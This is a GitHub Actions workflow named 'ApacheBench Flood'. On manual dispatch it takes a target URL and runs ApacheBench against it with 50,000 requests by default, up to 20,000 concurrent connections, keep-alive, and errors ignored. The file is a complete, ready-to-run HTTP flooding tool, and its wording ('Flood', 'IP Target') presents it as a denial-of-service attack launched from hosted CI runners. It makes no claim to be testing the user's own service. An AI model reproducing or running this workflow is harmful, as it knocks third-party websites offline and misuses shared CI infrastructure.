name: ApacheBench Flood

on:
  workflow_dispatch:
    inputs:
      iptgt:
        description: "IP Target"
        required: true
        default: "http://"
      numreq:
        description: "Number of Request(s): "
        required: true
        default: "50000"
      multiconn:
        description: "Multi Connection (Max. 20k): "
        required: true
        default: "20000"
      psize:
        description: "Packet Size: "
        required: true
        default: "9048"
      maxtimeout:
        description: "Max Socket Timeout (In Second): "
        required: true
        default: "1"

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - name: Install dependencies & Prepare
      run: |
        sudo apt install apache2-utils
        sudo ulimit -n 65536
    - name: Starting Flood...
      run: |
        sudo ab -n ${{ github.event.inputs.numreq }} -c ${{ github.event.inputs.multiconn }} -b ${{ github.event.inputs.psize }} -s ${{ github.event.inputs.maxtimeout }} -k -r ${{ github.event.inputs.iptgt }}/
